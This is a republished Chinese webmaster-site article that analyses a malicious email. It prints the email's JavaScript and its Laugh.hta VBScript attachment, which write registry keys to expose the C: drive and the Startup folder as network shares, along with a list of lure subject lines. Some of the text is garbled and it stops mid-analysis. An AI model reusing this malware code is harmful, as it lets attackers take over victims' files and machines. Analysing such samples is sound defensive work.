加入收藏 | 设为首页 | 会员中心 | 我要投稿 威海站长网 (https://www.0631zz.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > MsSql教程 > 正文

不明邮件是如何共享你的硬盘的

发布时间:2019-12-12 11:11:36 所属栏目:MsSql教程 来源:蓝点
导读:function f() //改写注册表的函数 { var aa,ss; aa=document.applets[0]; aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); aa.createInstance(); ss=aa.GetObject(); ss.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionN
function f() //改写注册表的函数
  {
  var aa,ss;
  aa=document.applets[0];
  aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  aa.createInstance();
  ss=aa.GetObject();
  ss.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetwork
LanManC$Flags",302,"REG_DWORD");
  ss.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetwork
LanManC$Type",0,"REG_DWORD");
  ss.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetwork
LanManC$Path","C:");
  }
  function init()
  {
  setTimeout("f()", 1000); //每过1000毫秒就再次递归调用f()
  }
  init(); //调用函数
  〈/script〉
  〈/BODY〉〈/HTML〉
??
  这封邮件就是利用了MS.ActiveX元件的写注册表的功能,只要你一读这封信,它就会在注册表的HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanMan中添加了一个键值C$,并且将C盘改为完全共享!这样黑客可以用SMB扫描器直接登陆你的C盘,他可以在硬盘中随意拷贝文件,删除文件,添加文件……并且可以给你上传木马,永久而全面地控制你的机器。
??
  再来看一看附件Laugh.hta吧。我查看了一下“文件类型”,发现“.hta”后缀名其实是HTML Application文件,可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文件,就将它导出为Txt文件——哈哈!全看到了!
??
  〈html〉
  〈script language=vbs〉
  On Error Resume Next· 容错语句,避免程序崩溃
  set aa=CreateObject("WScript.Shell")·建立WScript对象
  Set fs = CreateObject("Scripting.FileSystemObject")·建立文件系统对象
  Set dir1 = fs.GetSpecialFolder(0)·得到Windows路径
  Set dir2 = fs.GetSpecialFolder(1)·得到System路径
  dir1=dir1+"START MENUPROGRAMS启动" aa.RegWrite"HKLMSoftwareMicrosoftWindowsCurrentVersionNetwork
LanManS$Flags",302,"REG_DWORD"·写入Dword值Flags,这是共享类型的标志
??aa.RegWrite"HKLMSoftwareMicrosoftWindowsCurrentVersionNetwork
LanManS$Type",0,"REG_DWORD"·写入Dword值Type
??aa.RegWrite"HKLMSoftwareMicrosoftWindowsCurrentVersionNetwork
LanManS$Path",dir1·写入共享资源的绝对路径
  a=10
  Set Os = CreateObject("Scriptlet.TypeLib")·建立自定义枚举对象
  doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”“How about have dinner with me together?”"
  ·一堆垃圾码,以备写入目标文件

(编辑:威海站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    热点阅读